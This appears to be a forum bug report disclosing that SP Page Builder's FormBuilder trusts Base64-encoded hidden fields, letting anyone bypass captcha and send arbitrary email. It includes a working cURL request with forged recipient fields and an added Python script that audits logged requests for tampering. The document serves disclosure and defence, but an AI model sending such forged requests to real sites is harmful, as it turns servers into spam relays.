- FormBuilder allows anyone to send email with any text to any address.
- FormBuilder allows anyone to ignore captcha.
The reason: FormBuilder encodes all parameters (sender address, recipient address, email text and so on) in Base64 and stores them in hidden form fields. The server side then uses the values from these fields, and not the stored plugin parameters.
Thus, if someone modifies the request (using Postman, for instance), it becomes possible to completely ignore the captcha (simply by removing the captcha-related fields from the request) and to send any email to any recipient (by modifying the corresponding fields). That allows your server to be used as a spam bot.
Also, I suspect this vulnerability exists even if you didn't create forms and just installed SP Page Builder.
A simple cURL example, in which I modified the fields, removed the captcha and sent the email to an external address:
curl --location --request POST 'yourdomain' \
--header 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' \
--header 'Accept: */*' \
--header 'X-Requested-With: XMLHttpRequest' \
--data-urlencode 'addon=form_builder' \
--data-urlencode 'data[0][name]=form-builder-item-[first-name*]' \
--data-urlencode 'data[0][value]=Test 9' \
--data-urlencode 'data[10][name]=success_message' \
--data-urlencode 'data[10][value]=0J/QvtCy0ZbQtNC+0LzQu9C10L3QvdGPINGD0YHQv9GW0YjQvdC+INCy0ZbQtNC/0YDQsNCy0LvQtdC90LUh' \
--data-urlencode 'data[11][name]=failed_message' \
--data-urlencode 'data[11][value]=0JzQuCDQvdC1INC30LzQvtCz0LvQuCDQstGW0LTQv9GA0LDQstC40YLQuCDQv9C+0LLRltC00L7QvNC70LXQvdC90Y8uINCR0YPQtNGMINC70LDRgdC60LAsINC/0LXRgNC10LLRltGA0YLQtSDQvtCx0L7QsifRj9C30LrQvtCy0ZYg0L/QvtC70Y8g0YLQsCDRgdC/0YDQvtCx0YPQudGC0LUg0YnQtSDRgNCw0Lch' \
--data-urlencode 'data[14][name]=policy' \
--data-urlencode 'data[14][value]=Yes' \
--data-urlencode 'data[15][name]=is_policy' \
--data-urlencode 'data[15][value]=true' \
--data-urlencode 'data[16][name]=module_id' \
--data-urlencode 'data[16][value]=151' \
--data-urlencode 'data[17][name]=view_type' \
--data-urlencode 'data[17][value]=module' \
--data-urlencode 'data[1][name]=form-builder-item-[phone*]' \
--data-urlencode 'data[1][value]=2323' \
--data-urlencode 'data[2][name]=form-builder-item-[email*]' \
--data-urlencode 'data[2][value][email protected]' \
--data-urlencode 'data[3][name]=form-builder-item-[message*]' \
--data-urlencode 'data[3][value]=Test 9' \
--data-urlencode 'data[4][name]=recipient' \
--data-urlencode 'data[4][value]=c29tZWJvZHlAZ21haWwuY29t' \
--data-urlencode 'data[5][name]=from' \
--data-urlencode 'data[5][value]=c29tZWJvZHlAZ21haWwuY29t' \
--data-urlencode 'data[6][name]=addon_id' \
--data-urlencode 'data[6][value]=1652456565291' \
--data-urlencode 'data[7][name]=additional_header' \
--data-urlencode 'data[7][value]=UmVwbHktVG86IHt7ZW1haWx9fQpSZXBseS1uYW1lOiB7e2ZpcnN0LW5hbWV9fQ==' \
--data-urlencode 'data[8][name]=email_subject' \
--data-urlencode 'data[8][value]=0JfQsNGP0LLQutCwINC90LAg0LHQtdGB0LrQvtGI0YLQvtCy0L3RgyDQtNC10LzQvtC90YHRgtGA0LDRhtGW0Y4gfCB7e3NpdGUtbmFtZX19' \
--data-urlencode 'data[9][name]=email_template' \
--data-urlencode 'data[9][value]=PHA+PHN0cm9uZz7QktGW0LQ6PC9zdHJvbmc+IHt7Zmlyc3QtbmFtZX19PC9wPgo8cD48c3Ryb25nPtCi0LXQu9C10YTQvtC9Ojwvc3Ryb25nPiB7e3Bob25lfX08L3A+CjxwPjxzdHJvbmc+RW1haWw6PC9zdHJvbmc+IHt7ZW1haWx9fTwvcD4KPHA+PHN0cm9uZz7Qn9C+0LLRltC00L7QvNC70LXQvdC90Y86PC9zdHJvbmc+IHt7bWVzc2FnZX19PC9wPg==' \
--data-urlencode 'option=com_sppagebuilder' \
--data-urlencode 'task=ajax'
SP Page Builder Pro 3.8.6
Joomla 4.1.1
Helix Ultimate 2
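
Added example, not part of the original post and not SP Page Builder code: a Python audit of captured `form_builder` POST bodies that decodes the Base64 `recipient` and `from` fields and flags requests that differ from the stored configuration or lack the captcha field. `CONFIGURED`, `CAPTCHA_FIELD` and the sample bodies are assumptions constructed for illustration; the tampered recipient value is the one from the request above.

```python
import base64
import re
from urllib.parse import parse_qsl, urlencode

# Assumptions: values the site owner stored in the addon settings, and the
# name of the captcha field a genuine form posts (placeholder, not from the page).
CONFIGURED = {"recipient": "owner@example.org", "from": "owner@example.org"}
CAPTCHA_FIELD = "CAPTCHA_FIELD_PLACEHOLDER"

def form_fields(body):
    """Collapse data[N][name] / data[N][value] pairs into {name: value}."""
    slots = {}
    for key, val in parse_qsl(body, keep_blank_values=True):
        m = re.fullmatch(r"data\[(\d+)\]\[(name|value)\]", key)
        if m:
            slots.setdefault(m.group(1), {})[m.group(2)] = val
    return {s["name"]: s.get("value", "") for s in slots.values() if "name" in s}

def b64_text(value):
    try:
        return base64.b64decode(value, validate=True).decode("utf-8")
    except (ValueError, UnicodeDecodeError):  # not valid Base64 / UTF-8
        return None

def audit(body):
    """Return findings for one form_builder POST body (empty list = consistent)."""
    if dict(parse_qsl(body)).get("addon") != "form_builder":
        return []
    fields, findings = form_fields(body), []
    for key, expected in CONFIGURED.items():
        got = b64_text(fields.get(key, ""))
        if got is None or got.strip().lower() != expected:
            findings.append(f"{key} does not match stored configuration")
    if CAPTCHA_FIELD not in fields:
        findings.append("captcha field missing")
    return findings

def sample_body(recipient_b64, with_captcha):
    """Constructed sample in the shape of the request shown in the post."""
    pairs = [("recipient", recipient_b64), ("from", recipient_b64)]
    if with_captcha:
        pairs.append((CAPTCHA_FIELD, "answer"))
    items = [("addon", "form_builder"), ("option", "com_sppagebuilder")]
    for i, (name, value) in enumerate(pairs):
        items += [(f"data[{i}][name]", name), (f"data[{i}][value]", value)]
    return urlencode(items)

GENUINE = sample_body(base64.b64encode(b"owner@example.org").decode(), True)
TAMPERED = sample_body("c29tZWJvZHlAZ21haWwuY29t", False)  # value from the post
```

This only detects tampered submissions in logs or at a proxy; the mismatch disappears at the source when the server reads recipient, sender and captcha settings from its stored addon parameters instead of the request.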